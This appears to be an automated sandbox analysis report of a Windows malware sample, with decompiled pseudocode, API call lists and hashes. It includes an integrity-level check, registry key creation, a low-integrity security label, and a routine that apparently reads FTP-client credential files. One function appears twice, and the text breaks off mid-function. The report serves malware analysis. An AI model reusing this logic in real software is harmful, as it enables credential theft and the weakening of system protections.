        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
        • String ID: QN@
        • API String ID: 2459967240-2316942990
        • Opcode ID: d7cae2b8589381db74dc6e687a73c927c6812c9386db1542821bdad1d22ae52b
        • Instruction ID: a7a08f163eaec10adf082d04207e802cc9d62303a2fb228ec2632a2d19179faf
        • Opcode Fuzzy Hash: d7cae2b8589381db74dc6e687a73c927c6812c9386db1542821bdad1d22ae52b
        • Instruction Fuzzy Hash: F221DE71D41119BADF20EBA1CD05FDF7BBCAF84310F0041A6A600F31A0DB399A41CA64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E0040D916(void* __ecx) {
        				long _v8;
        				void* _v12;
        				char* _t21;
        				signed char _t22;
        				DWORD* _t25;
        				void* _t32;
        
        				_t28 = 0;
        				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
        					L14:
        					return _t28;
        				}
        				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
        					L13:
        					CloseHandle(_v12);
        					goto L14;
        				} else {
        					_t32 = E0040C192(_v8);
        					if(_t32 == 0) {
        						L12:
        						goto L13;
        					}
        					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
        						_t21 = GetSidSubAuthorityCount( *_t32);
        						if(_t21 != 0) {
        							_t22 =  *_t21;
        							if(_t22 > 0) {
        								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
        								if(_t25 != 0) {
        									if( *_t25 >= 0x2000) {
        										asm("sbb bl, bl");
        										_t28 = 3;
        									} else {
        										_t28 = 1;
        									}
        								}
        							}
        						}
        					}
        					E0040C1C2(_t32);
        					goto L12;
        				}
        			}

        APIs
        • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D926
        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,0001FEBC,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D946
        • GetLastError.KERNEL32(?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D94C
        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D973
        • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D97B
        • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D992
        • CloseHandle.KERNEL32(?,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D9BD
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
        • String ID:
        • API String ID: 3714493844-0
        • Opcode ID: d3ef0378942a04670fe06f51cde1e823b8d1c45a2ad1b75cb6d16dae2893d515
        • Instruction ID: c3d8cdcc048b92f71fa599b908cc6ac6bae12259ac95733aa2591340d51e01ae
        • Opcode Fuzzy Hash: d3ef0378942a04670fe06f51cde1e823b8d1c45a2ad1b75cb6d16dae2893d515
        • Instruction Fuzzy Hash: A4118175A00018BFEB115BD4DE84EAE3B6EEF45314F100176F540F62E0D7799E89AB68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004106DC(short* _a4) {
        				char _v5;
        				int _v12;
        				void* _v16;
        				void* _v20;
        				int _v24;
        				long _t18;
        
        				_v5 = 0;
        				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
        				_t33 = _t18;
        				if(_t18 == 0) {
        					_v12 = 0;
        					do {
        						E00410541(6, 4, _t33, 2, _a4);
        						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
        							goto L4;
        						} else {
        							RegCloseKey(_v20);
        							if(_v24 == 1) {
        								_v5 = 1;
        							} else {
        								goto L4;
        							}
        						}
        						L7:
        						RegCloseKey(_v16);
        						goto L8;
        						L4:
        						_v12 = _v12 + 1;
        					} while (_v12 < 0x64);
        					goto L7;
        				}
        				L8:
        				return _v5;
        			}

        APIs
        • RegCreateKeyExW.ADVAPI32(?,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00410704
          • Part of subcall function 00410541: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00410662
        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00410736
        • RegCloseKey.ADVAPI32(?), ref: 0041073F
        • RegCloseKey.ADVAPI32(?), ref: 00410759
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseCreate$CharUpper
        • String ID: SOFTWARE\Microsoft$d
        • API String ID: 1794619670-1227932965
        • Opcode ID: 2f3bbecf64628a8107dacd1b239af6d8eed1ad0a70a06ea6be7b650f4e4518dd
        • Instruction ID: 0d9f4bfd91e3f8eae80743e233cccfe7f4a86c1f08a648fe995b5b573335f553
        • Opcode Fuzzy Hash: 2f3bbecf64628a8107dacd1b239af6d8eed1ad0a70a06ea6be7b650f4e4518dd
        • Instruction Fuzzy Hash: 2C1161B590020CBEEB019B94DD81EFFBBBCEB05388F104066F511B21A1D2B59E858B74
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E0040F843(intOrPtr _a4) {
        				struct _ACL* _v8;
        				struct _SECURITY_DESCRIPTOR* _v12;
        				int _v16;
        				int _v20;
        				void** _t11;
        				int _t16;
        				struct _ACL* _t18;
        
        				_t18 = 0;
        				E0040D88E(L"SeSecurityPrivilege");
        				_t11 =  &_v12;
        				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
        				if(_t11 != 0) {
        					_v8 = 0;
        					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
        					if(_t16 != 0) {
        						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
        						if(_t16 == 0) {
        							_t18 = 1;
        						}
        					}
        					LocalFree(_v12);
        				}
        				return _t18;
        			}

        APIs
          • Part of subcall function 0040D88E: GetCurrentThread.KERNEL32 ref: 0040D89E
          • Part of subcall function 0040D88E: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8A5
          • Part of subcall function 0040D88E: OpenProcessToken.ADVAPI32(000000FF,00000020,0040B17E,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8B7
        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040F862
        • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 0040F87E
        • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 0040F895
        • LocalFree.KERNEL32(00000000), ref: 0040F8A4
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
        • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
        • API String ID: 3555451682-1937014404
        • Opcode ID: 78359a01a79895dba4bb20c5a8f07e53e7606c108d77db61401bdaafbfe76a0d
        • Instruction ID: f1782867dcea977c6d72f02bc48075ec8c9855c20e992ddcee7adb817be3e79d
        • Opcode Fuzzy Hash: 78359a01a79895dba4bb20c5a8f07e53e7606c108d77db61401bdaafbfe76a0d
        • Instruction Fuzzy Hash: AD016D7664020CBFEB11AFA08D85EEE7B7DEB04744F004476BA01B11A1D77A9A449A28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 77%
        			E00407FF8(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
        				long _v8;
        				void* __ebx;
        				void* __esi;
        				signed int _t47;
        				signed short _t58;
        				int _t65;
        				signed int _t66;
        				signed short _t75;
        				void* _t79;
        
        				_t70 = __ecx;
        				_push(__ecx);
        				_t75 = _a16;
        				_t79 = __eax;
        				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
        					_t65 = GetAncestor(_a4, 2);
        					if(_t65 ==  *(_t79 + 0x170)) {
        						goto L8;
        					}
        					_t70 = _a12 & 0x0000ffff;
        					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
        					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
        						 *(_t79 + 0x170) = _t65;
        						goto L8;
        					} else {
        						goto L35;
        					}
        				} else {
        					L8:
        					_t66 = _a12 & 0x0000ffff;
        					_v8 = _t66;
        					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
        					if(_a12 != 1) {
        						_t47 = E00407F19(_t70, _t79, _a4, _a20);
        						_a20 = _t47;
        						__eflags = _t66 - 8;
        						if(__eflags > 0) {
        							__eflags = _t66 - 9;
        							if(__eflags == 0) {
        								__eflags = _t47 - 0xa2;
        								if(_t47 != 0xa2) {
        									__eflags = _t47 - 0xa5;
        									if(_t47 != 0xa5) {
        										L35:
        										return _t47;
        									}
        									_t47 = 0xffff;
        									L59:
        									__eflags = _t47;
        									if(_t47 == 0) {
        										goto L35;
        									}
        									__eflags = _t47 - 0xffff;
        									if(_t47 != 0xffff) {
        										L33:
        										_push(_a28);
        										_push(_t47 & 0x0000ffff);
        										_push(0x112);
        										L34:
        										_t47 = PostMessageW(_a4, ??, ??, ??);
        										goto L35;
        									}
        									L61:
        									_push(_a28);
        									_push(_a4);
        									_push(0x7b);
        									goto L34;
        								}
        								_t47 =  *(_a8 + 0x24);
        								__eflags = _t47 & 0x00010000;
        								if((_t47 & 0x00010000) == 0) {
        									goto L35;
        								}
        								asm("sbb eax, eax");
        								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
        								goto L59;
        							}
        							if(__eflags <= 0) {
        								L25:
        								_push(_a28);
        								_push(_t66);
        								L10:
        								_push(_t47);
        								goto L34;
        							}
        							__eflags = _t66 - 0x11;
        							if(_t66 <= 0x11) {
        								L40:
        								__eflags = _t47 - 0xa1;
        								if(_t47 == 0xa1) {
        									_t47 = E00407D89(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
        								}
        								goto L35;
        							}
        							__eflags = _t66 - 0x14;
        							if(_t66 == 0x14) {
        								__eflags = _t47 - 0xa2;
        								if(_t47 != 0xa2) {
        									L21:
        									__eflags = _t47 - 0xa5;
        									L22:
        									if(__eflags != 0) {
        										goto L35;
        									}
        									goto L61;
        								}
        								L32:
        								_t47 = 0xf060;
        								goto L33;
        							}
        							__eflags = _t66 - 0x15;
        							if(_t66 != 0x15) {
        								goto L25;
        							}
        							__eflags = _t47 - 0xa2;
        							if(_t47 != 0xa2) {
        								goto L21;
        							}
        							_t47 = 0xf180;
        							goto L33;
        						}
        						if(__eflags == 0) {
        							__eflags = _t47 - 0xa2;
        							if(_t47 != 0xa2) {
        								goto L21;
        							}
        							_t47 = _a8;
        							__eflags =  *(_t47 + 0x24) & 0x00020000;
        							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
        								goto L35;
        							}
        							_t47 = 0xf020;
        							goto L33;
        						}
        						__eflags = _t66 - 2;
        						if(_t66 == 2) {
        							__eflags = _t47 - 0xa3;
        							if(_t47 == 0xa3) {
        								goto L25;
        							}
        							__eflags = _t47 - 0xa5;
        							if(_t47 == 0xa5) {
        								goto L61;
        							}
        							goto L40;
        						}
        						__eflags = _t66 - 3;
        						if(_t66 == 3) {
        							__eflags = _t47 - 0xa3;
        							if(_t47 != 0xa3) {
        								__eflags = _t47 - 0xa5;
        								if(_t47 == 0xa5) {
        									goto L61;
        								}
        								__eflags = _t47 - 0xa1;
        								goto L22;
        							}
        							goto L32;
        						}
        						__eflags = _t66 - 5;
        						if(_t66 == 5) {
        							__eflags = _t47 - 0xa1;
        							if(_t47 != 0xa1) {
        								__eflags = _t47 - 0xa0;
        								if(_t47 != 0xa0) {
        									goto L35;
        								}
        								_push(0);
        								_push(0xfffffffe);
        								L28:
        								_push( *((intOrPtr*)(_t79 + 8)));
        								goto L34;
        							}
        							_push(0);
        							_push(0xffffffff);
        							goto L28;
        						}
        						__eflags = _t66 - 6 - 1;
        						if(_t66 - 6 > 1) {
        							goto L25;
        						}
        						__eflags = _t47 - 0xa1;
        						if(_t47 == 0xa1) {
        							E00407D89(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
        							_t47 = _a20;
        							_t66 = _v8;
        							goto L25;
        						}
        						__eflags = _t47 - 0xa2;
        						if(_t47 == 0xa2) {
        							goto L25;
        						}
        						__eflags = _t47 - 0xa3;
        						if(_t47 == 0xa3) {
        							goto L25;
        						}
        						__eflags = _t47 - 0xa0;
        						if(_t47 == 0xa0) {
        							goto L25;
        						}
        						goto L21;
        					}
        					_t58 = E00416AB6(0, _t79, 0);
        					_push(_a24);
        					_push(_t58 & 0x0000ffff);
        					_t47 = E00407F19(_t79, _t79, _a4, _a16);
        					goto L10;
        				}
        			}

        APIs
        • GetAncestor.USER32(?,00000002), ref: 00408021
        • SendMessageTimeoutW.USER32 ref: 0040804C
        • PostMessageW.USER32(?,00000020,?,00000000), ref: 0040808E
        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00408124
        • PostMessageW.USER32(?,00000112,?,?), ref: 00408177
        • GetWindowThreadProcessId.USER32(?,00000000), ref: 004081B6
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
        • String ID:
        • API String ID: 1223205383-0
        • Opcode ID: 777d210d25c70c33b8ef28551b3f33dab2c9283d89e9b6b50b7c6f94b7f0c4b7
        • Instruction ID: 00ebfd8a87f7ed5b7d6f2997a2a79c770807de206319f7e02cd51a52678822f0
        • Opcode Fuzzy Hash: 777d210d25c70c33b8ef28551b3f33dab2c9283d89e9b6b50b7c6f94b7f0c4b7
        • Instruction Fuzzy Hash: E4518130600305AAEF304E19CE85BBE3664EF15350F24053FF9C1BA2E1CA7DDD92A65A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 77%
        			E00407FF8(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
        				long _v8;
        				void* __ebx;
        				void* __esi;
        				signed int _t47;
        				signed short _t58;
        				int _t65;
        				signed int _t66;
        				signed short _t75;
        				void* _t79;
        
        				_t70 = __ecx;
        				_push(__ecx);
        				_t75 = _a16;
        				_t79 = __eax;
        				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
        					_t65 = GetAncestor(_a4, 2);
        					if(_t65 ==  *(_t79 + 0x170)) {
        						goto L8;
        					}
        					_t70 = _a12 & 0x0000ffff;
        					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
        					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
        						 *(_t79 + 0x170) = _t65;
        						goto L8;
        					} else {
        						goto L35;
        					}
        				} else {
        					L8:
        					_t66 = _a12 & 0x0000ffff;
        					_v8 = _t66;
        					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
        					if(_a12 != 1) {
        						_t47 = E00407F19(_t70, _t79, _a4, _a20);
        						_a20 = _t47;
        						__eflags = _t66 - 8;
        						if(__eflags > 0) {
        							__eflags = _t66 - 9;
        							if(__eflags == 0) {
        								__eflags = _t47 - 0xa2;
        								if(_t47 != 0xa2) {
        									__eflags = _t47 - 0xa5;
        									if(_t47 != 0xa5) {
        										L35:
        										return _t47;
        									}
        									_t47 = 0xffff;
        									L59:
        									__eflags = _t47;
        									if(_t47 == 0) {
        										goto L35;
        									}
        									__eflags = _t47 - 0xffff;
        									if(_t47 != 0xffff) {
        										L33:
        										_push(_a28);
        										_push(_t47 & 0x0000ffff);
        										_push(0x112);
        										L34:
        										_t47 = PostMessageW(_a4, ??, ??, ??);
        										goto L35;
        									}
        									L61:
        									_push(_a28);
        									_push(_a4);
        									_push(0x7b);
        									goto L34;
        								}
        								_t47 =  *(_a8 + 0x24);
        								__eflags = _t47 & 0x00010000;
        								if((_t47 & 0x00010000) == 0) {
        									goto L35;
        								}
        								asm("sbb eax, eax");
        								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
        								goto L59;
        							}
        							if(__eflags <= 0) {
        								L25:
        								_push(_a28);
        								_push(_t66);
        								L10:
        								_push(_t47);
        								goto L34;
        							}
        							__eflags = _t66 - 0x11;
        							if(_t66 <= 0x11) {
        								L40:
        								__eflags = _t47 - 0xa1;
        								if(_t47 == 0xa1) {
        									_t47 = E00407D89(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
        								}
        								goto L35;
        							}
        							__eflags = _t66 - 0x14;
        							if(_t66 == 0x14) {
        								__eflags = _t47 - 0xa2;
        								if(_t47 != 0xa2) {
        									L21:
        									__eflags = _t47 - 0xa5;
        									L22:
        									if(__eflags != 0) {
        										goto L35;
        									}
        									goto L61;
        								}
        								L32:
        								_t47 = 0xf060;
        								goto L33;
        							}
        							__eflags = _t66 - 0x15;
        							if(_t66 != 0x15) {
        								goto L25;
        							}
        							__eflags = _t47 - 0xa2;
        							if(_t47 != 0xa2) {
        								goto L21;
        							}
        							_t47 = 0xf180;
        							goto L33;
        						}
        						if(__eflags == 0) {
        							__eflags = _t47 - 0xa2;
        							if(_t47 != 0xa2) {
        								goto L21;
        							}
        							_t47 = _a8;
        							__eflags =  *(_t47 + 0x24) & 0x00020000;
        							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
        								goto L35;
        							}
        							_t47 = 0xf020;
        							goto L33;
        						}
        						__eflags = _t66 - 2;
        						if(_t66 == 2) {
        							__eflags = _t47 - 0xa3;
        							if(_t47 == 0xa3) {
        								goto L25;
        							}
        							__eflags = _t47 - 0xa5;
        							if(_t47 == 0xa5) {
        								goto L61;
        							}
        							goto L40;
        						}
        						__eflags = _t66 - 3;
        						if(_t66 == 3) {
        							__eflags = _t47 - 0xa3;
        							if(_t47 != 0xa3) {
        								__eflags = _t47 - 0xa5;
        								if(_t47 == 0xa5) {
        									goto L61;
        								}
        								__eflags = _t47 - 0xa1;
        								goto L22;
        							}
        							goto L32;
        						}
        						__eflags = _t66 - 5;
        						if(_t66 == 5) {
        							__eflags = _t47 - 0xa1;
        							if(_t47 != 0xa1) {
        								__eflags = _t47 - 0xa0;
        								if(_t47 != 0xa0) {
        									goto L35;
        								}
        								_push(0);
        								_push(0xfffffffe);
        								L28:
        								_push( *((intOrPtr*)(_t79 + 8)));
        								goto L34;
        							}
        							_push(0);
        							_push(0xffffffff);
        							goto L28;
        						}
        						__eflags = _t66 - 6 - 1;
        						if(_t66 - 6 > 1) {
        							goto L25;
        						}
        						__eflags = _t47 - 0xa1;
        						if(_t47 == 0xa1) {
        							E00407D89(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
        							_t47 = _a20;
        							_t66 = _v8;
        							goto L25;
        						}
        						__eflags = _t47 - 0xa2;
        						if(_t47 == 0xa2) {
        							goto L25;
        						}
        						__eflags = _t47 - 0xa3;
        						if(_t47 == 0xa3) {
        							goto L25;
        						}
        						__eflags = _t47 - 0xa0;
        						if(_t47 == 0xa0) {
        							goto L25;
        						}
        						goto L21;
        					}
        					_t58 = E00416AB6(0, _t79, 0);
        					_push(_a24);
        					_push(_t58 & 0x0000ffff);
        					_t47 = E00407F19(_t79, _t79, _a4, _a16);
        					goto L10;
        				}
        			}

        APIs
        • GetAncestor.USER32(?,00000002), ref: 00408021
        • SendMessageTimeoutW.USER32 ref: 0040804C
        • PostMessageW.USER32(?,00000020,?,00000000), ref: 0040808E
        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00408124
        • PostMessageW.USER32(?,00000112,?,?), ref: 00408177
        • GetWindowThreadProcessId.USER32(?,00000000), ref: 004081B6
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
        • String ID:
        • API String ID: 1223205383-0
        • Opcode ID: 777d210d25c70c33b8ef28551b3f33dab2c9283d89e9b6b50b7c6f94b7f0c4b7
        • Instruction ID: 00ebfd8a87f7ed5b7d6f2997a2a79c770807de206319f7e02cd51a52678822f0
        • Opcode Fuzzy Hash: 777d210d25c70c33b8ef28551b3f33dab2c9283d89e9b6b50b7c6f94b7f0c4b7
        • Instruction Fuzzy Hash: E4518130600305AAEF304E19CE85BBE3664EF15350F24053FF9C1BA2E1CA7DDD92A65A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E00418F2C(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
        				short _v524;
        				short _v528;
        				char _v568;
        				short _v584;
        				char _v596;
        				short _v600;
        				char _v608;
        				short _v612;
        				char _v616;
        				short _v620;
        				char _v624;
        				short _v628;
        				short* _v632;
        				WCHAR* _v636;
        				WCHAR* _v640;
        				WCHAR* _v644;
        				WCHAR* _v648;
        				WCHAR* _v652;
        				void* __edi;
        				void* __esi;
        				WCHAR* _t54;
        				WCHAR* _t57;
        				void* _t61;
        				void* _t63;
        				void* _t65;
        				void* _t67;
        				void* _t69;
        				WCHAR* _t72;
        				WCHAR* _t74;
        				long _t78;
        				int _t81;
        				long _t85;
        				long _t88;
        				WCHAR* _t89;
        				void* _t90;
        				WCHAR* _t94;
        				WCHAR* _t95;
        				WCHAR* _t111;
        				WCHAR* _t112;
        				WCHAR* _t117;
        				intOrPtr _t126;
        				signed int _t127;
        				void* _t129;
        
        				_t129 = (_t127 & 0xfffffff8) - 0x284;
        				if(E00411A47( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
        					L21:
        					return 1;
        				}
        				_t132 =  *__edx & 0x00000010;
        				if(( *__edx & 0x00000010) == 0) {
        					_t117 = E0040C192(0x1fffe);
        					_v628 = _t117;
        					__eflags = _t117;
        					if(_t117 == 0) {
        						goto L21;
        					}
        					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
        					__eflags = _t54;
        					if(_t54 <= 0) {
        						L20:
        						E0040C1C2(_t117);
        						goto L21;
        					}
        					_t9 =  &(_t54[0]); // 0x1
        					_t57 = E0040D072(_t117, _t9);
        					__eflags = _t57;
        					if(_t57 == 0) {
        						goto L20;
        					}
        					_t111 = E0040C192(0xc1c);
        					_v640 = _t111;
        					__eflags = _t111;
        					if(_t111 != 0) {
        						_t11 =  &(_t111[0x2fd]); // 0x5fa
        						_v632 = _t11;
        						_v644 = _t117;
        						_t61 = 0x72;
        						E004128DB(_t61,  &_v584);
        						_t63 = 0x73;
        						E004128DB(_t63,  &_v596);
        						_t65 = 0x74;
        						E004128DB(_t65,  &_v608);
        						_t67 = 0x75;
        						E004128DB(_t67,  &_v624);
        						_t69 = 0x76;
        						E004128DB(_t69,  &_v616);
        						goto L9;
        						L18:
        						_t74 = E0040D0AE(_v648, 1);
        						_v652 = _t74;
        						__eflags = _t74;
        						if(_t74 != 0) {
        							_t111 = _v644;
        							L9:
        							_t72 = StrStrIW(_v644,  &_v584);
        							__eflags = _t72;
        							if(_t72 == 0) {
        								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
        								__eflags = _t78;
        								if(_t78 != 0) {
        									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
        									_v640 = _t81;
        									__eflags = _t81 - 1 - 0xfffe;
        									if(_t81 - 1 <= 0xfffe) {
        										_t112 =  &(_t111[0xff]);
        										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
        										__eflags = _t85;
        										if(_t85 != 0) {
        											_t33 =  &(_t112[0xff]); // 0x0
        											_t124 = _t33;
        											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
        											__eflags = _t88;
        											if(_t88 != 0) {
        												_t89 = E0040CD11(_t124);
        												__eflags = _t89;
        												if(_t89 > 0) {
        													_t125 =  &_v568;
        													_t90 = 0x55;
        													E004128DB(_t90,  &_v568);
        													_push(_v640);
        													_t38 =  &(_t112[0xff]); // 0x0
        													_push(_v644);
        													_push(_t112);
        													_t113 = _v636;
        													_t94 = E0040CEB5(_t125, 0x311, _v636, _t125);
        													_t129 = _t129 + 0x14;
        													__eflags = _t94;
        													if(_t94 > 0) {
        														_t126 = _a4;
        														_t95 = E0040C5B6(_t94, _t126, _t113);
        														__eflags = _t95;
        														if(_t95 != 0) {
        															_t42 = _t126 + 4;
        															 *_t42 =  &(( *(_t126 + 4))[0]);
        															__eflags =  *_t42;
        														}
        													}
        												}
        											}
        										}
        									}
        								}
        							}
        							goto L18;
        						}
        						E0040C1C2(_v644);
        						_t117 = _v636;
        					}
        					goto L20;
        				} else {
        					E00418EF4(_t132,  &_v524, _a4);
        					goto L21;
        				}
        			}

        APIs
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • GetPrivateProfileStringW.KERNEL32 ref: 00418FA1
        • StrStrIW.SHLWAPI(?,?), ref: 0041902E
        • GetPrivateProfileStringW.KERNEL32 ref: 00419056
        • GetPrivateProfileIntW.KERNEL32 ref: 00419073
        • GetPrivateProfileStringW.KERNEL32 ref: 004190A4
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfile$String$CombinePath
        • String ID:
        • API String ID: 2134968610-0
        • Opcode ID: 56ef5acd8f2f4cd420e209078529e021596638388333e43c41fea14cb923cb87
        • Instruction ID: f3d623ec705d1555fb261c9be25218f04cc3dab65b2a6e8920ef28678abc3406
        • Opcode Fuzzy Hash: 56ef5acd8f2f4cd420e209078529e021596638388333e43c41fea14cb923cb87
        • Instruction Fuzzy Hash: 52519332504306BBDB10EB61CC55AEBB7E8EF85704F00092EF988E7191DB78DD85879A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041CA62(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
        				char _v5;
        				char _v12;
        				signed int _v16;
        				char _v20;
        				char _v24;
        				long _v28;
        				void* __edi;
        				void* __esi;
        				signed int _t55;
        				void* _t58;
        				struct _GOPHER_FIND_DATAA _t59;
        				intOrPtr _t60;
        				struct _GOPHER_FIND_DATAA _t61;
        				struct _GOPHER_FIND_DATAA _t62;
        				signed int _t71;
        				struct _GOPHER_FIND_DATAA _t79;
        				struct _GOPHER_FIND_DATAA _t84;
        				int _t89;
        				struct _GOPHER_FIND_DATAA _t91;
        				void* _t96;
        				intOrPtr* _t99;
        				struct _GOPHER_FIND_DATAA _t103;
        				struct _GOPHER_FIND_DATAA _t107;
        
        				_v16 = _v16 | 0xffffffff;
        				EnterCriticalSection(0x42400c);
        				_t99 = _a4;
        				_t55 = E0041C2C7( *_t99);
        				if(_t55 == 0xffffffff) {
        					L33:
        					LeaveCriticalSection(0x42400c);
        					return _v16;
        				}
        				_t58 = _t55 * 0x24 +  *0x423e7c;
        				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
        					goto L33;
        				}
        				_t96 = _t58;
        				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
        					_t59 = _a16;
        					__eflags = _t59;
        					if(_t59 != 0) {
        						 *_t59 =  *_t59 & 0x00000000;
        						__eflags =  *_t59;
        					}
        					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
        					if(__eflags != 0) {
        						L22:
        						_t60 =  *((intOrPtr*)(_t96 + 0x18));
        						__eflags = _t60 - 0xffffffff;
        						if(_t60 != 0xffffffff) {
        							__eflags = _v16 - 0xffffffff;
        							if(_v16 == 0xffffffff) {
